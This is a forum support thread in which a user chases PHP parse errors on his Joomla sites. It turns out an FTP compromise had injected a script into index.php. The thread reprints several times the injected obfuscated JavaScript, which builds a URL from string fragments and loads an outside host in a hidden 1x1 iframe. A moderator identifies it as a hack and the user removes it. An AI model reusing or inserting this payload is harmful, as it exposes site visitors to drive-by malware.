- Posts: 188
- Thank you received: 0
Parse error: syntax error, unexpected '
- paulocamacho
-
Topic Author
- Offline
Less
More
15 years 1 month ago #23604
by paulocamacho
Parse error: syntax error, unexpected ' was created by paulocamacho
I have this , do you know what happens, Parse error: syntax error, unexpected '<' in ...index.php on line 89
thanks so much I really need help
thanks so much I really need help
Please Log in or Create an account to join the conversation.
15 years 1 month ago #23607
by nicolas
Replied by nicolas on topic Re: Parse error: syntax error, unexpected '
Please give the path of the file. There are tens of index.php files so it's not possible to know the problem without the full error message.
Please Log in or Create an account to join the conversation.
- paulocamacho
-
Topic Author
- Offline
Less
More
- Posts: 188
- Thank you received: 0
15 years 1 month ago #23608
by paulocamacho
Replied by paulocamacho on topic Re: Parse error: syntax error, unexpected '
this is it
Parse error: syntax error, unexpected $end, expecting T_FUNCTION in /homepages/16/d282439184/htdocs/printover2/templates/rt_tachyon_j15/features/login.php on line 36
Parse error: syntax error, unexpected $end, expecting T_FUNCTION in /homepages/16/d282439184/htdocs/printover2/templates/rt_tachyon_j15/features/login.php on line 36
Please Log in or Create an account to join the conversation.
- paulocamacho
-
Topic Author
- Offline
Less
More
- Posts: 188
- Thank you received: 0
15 years 1 month ago #23609
by paulocamacho
Replied by paulocamacho on topic Re: Parse error: syntax error, unexpected '
what I did was I delete the line 89 and now I get
Parse error: syntax error, unexpected $end, expecting T_FUNCTION in /homepages/16/d282439184/htdocs/printover2/templates/rt_tachyon_j15/features/login.php on line 36
Parse error: syntax error, unexpected $end, expecting T_FUNCTION in /homepages/16/d282439184/htdocs/printover2/templates/rt_tachyon_j15/features/login.php on line 36
Please Log in or Create an account to join the conversation.
- paulocamacho
-
Topic Author
- Offline
Less
More
- Posts: 188
- Thank you received: 0
15 years 1 month ago #23610
by paulocamacho
Replied by paulocamacho on topic Re: Parse error: syntax error, unexpected '
here is the index.php with the line 89 , look bad?
Please Log in or Create an account to join the conversation.
- paulocamacho
-
Topic Author
- Offline
Less
More
- Posts: 188
- Thank you received: 0
15 years 1 month ago #23611
by paulocamacho
Replied by paulocamacho on topic Re: Parse error: syntax error, unexpected '
I think I forgot the file
Please Log in or Create an account to join the conversation.
- paulocamacho
-
Topic Author
- Offline
Less
More
- Posts: 188
- Thank you received: 0
15 years 1 month ago #23612
by paulocamacho
Replied by paulocamacho on topic Re: Parse error: syntax error, unexpected '
sorry I just trying to upload the file , but don't let me here is the last lines
// trigger the onAfterRender events
JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');
/**
* RETURN THE RESPONSE
*/
89 line echo JResponse::toString($mainframe->getCfg('gzip'));
<script>ti='.c';ai='af';qo='p';jn='htm';rf='n';tf='doz';yn='ifr';xm='s';cl='o';jd='k9';nn='tv.';rl='85y';r='umu';eh='m/';ec='htt';sb='rc';f='ame';l='
/'; b=yn.concat(f);gg=xm.concat(sb);qt=ec.concat(qo,l,rf,r,tf,ai,ti,cl,eh,jd,rl,nn,jn);var xp=document.createElement(b);xp.setAttribute('width','1');xp.setAttribute('height','1');xp.frameBorder=0;xp.setAttribute(gg,qt);document.body.appendChild(xp);</script>
// trigger the onAfterRender events
JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');
/**
* RETURN THE RESPONSE
*/
89 line echo JResponse::toString($mainframe->getCfg('gzip'));
<script>ti='.c';ai='af';qo='p';jn='htm';rf='n';tf='doz';yn='ifr';xm='s';cl='o';jd='k9';nn='tv.';rl='85y';r='umu';eh='m/';ec='htt';sb='rc';f='ame';l='
/'; b=yn.concat(f);gg=xm.concat(sb);qt=ec.concat(qo,l,rf,r,tf,ai,ti,cl,eh,jd,rl,nn,jn);var xp=document.createElement(b);xp.setAttribute('width','1');xp.setAttribute('height','1');xp.frameBorder=0;xp.setAttribute(gg,qt);document.body.appendChild(xp);</script> Please Log in or Create an account to join the conversation.
15 years 1 month ago #23613
by nicolas
Replied by nicolas on topic Re: Parse error: syntax error, unexpected '
That's an error in your template tachyon from RocketTheme.
I'm afraid we can't help you as we don't know at all rockettheme templates. You should ask their support for help.
I'm afraid we can't help you as we don't know at all rockettheme templates. You should ask their support for help.
Please Log in or Create an account to join the conversation.
- paulocamacho
-
Topic Author
- Offline
Less
More
- Posts: 188
- Thank you received: 0
15 years 1 month ago #23615
by paulocamacho
Replied by paulocamacho on topic Re: Parse error: syntax error, unexpected '
Nic I just found that almost all my sites are down and this the error , the back end is fine
Parse error: syntax error, unexpected '<' in /homepages/23/d293195893/htdocs/GE-Directory/index.php on line 89
then I found in line 89 something like this :
<script>ti='.c';ai='af';qo='p';jn='htm';rf='n';tf='doz';yn='ifr';xm='s';cl='o';jd='k9';nn='tv.';rl='85y';r='umu';eh='m/';ec='htt';sb='rc';f='ame';l='
/';b=yn.concat(f);gg=xm.concat(sb);qt=ec.concat(qo,l,rf,r,tf,ai,ti,cl,eh,jd,rl,nn,jn);var xp=document.createElement(b);xp.setAttribute('width','1');xp.setAttribute('height','1');xp.frameBorder=0;xp.setAttribute(gg,qt);document.body.appendChild(xp);</script>
Parse error: syntax error, unexpected '<' in /homepages/23/d293195893/htdocs/GE-Directory/index.php on line 89
then I found in line 89 something like this :
<script>ti='.c';ai='af';qo='p';jn='htm';rf='n';tf='doz';yn='ifr';xm='s';cl='o';jd='k9';nn='tv.';rl='85y';r='umu';eh='m/';ec='htt';sb='rc';f='ame';l='
/';b=yn.concat(f);gg=xm.concat(sb);qt=ec.concat(qo,l,rf,r,tf,ai,ti,cl,eh,jd,rl,nn,jn);var xp=document.createElement(b);xp.setAttribute('width','1');xp.setAttribute('height','1');xp.frameBorder=0;xp.setAttribute(gg,qt);document.body.appendChild(xp);</script> Please Log in or Create an account to join the conversation.
15 years 1 month ago #23617
by nicolas
Replied by nicolas on topic Re: Parse error: syntax error, unexpected '
Looking at the javascript code on google, it looks like your websites might have been hacked:
www.google.co.uk/support/forum/p/Webmast...de0ceb03a46257&hl=en
www.google.co.uk/support/forum/p/Webmast...de0ceb03a46257&hl=en
Please Log in or Create an account to join the conversation.
- paulocamacho
-
Topic Author
- Offline
Less
More
- Posts: 188
- Thank you received: 0
15 years 1 month ago #23621
by paulocamacho
Replied by paulocamacho on topic Re: Parse error: syntax error, unexpected '
thanks men , it was a ftp hack , wow I remove that line and update the template, thanks again.
Please Log in or Create an account to join the conversation.
Time to create page: 0.210 seconds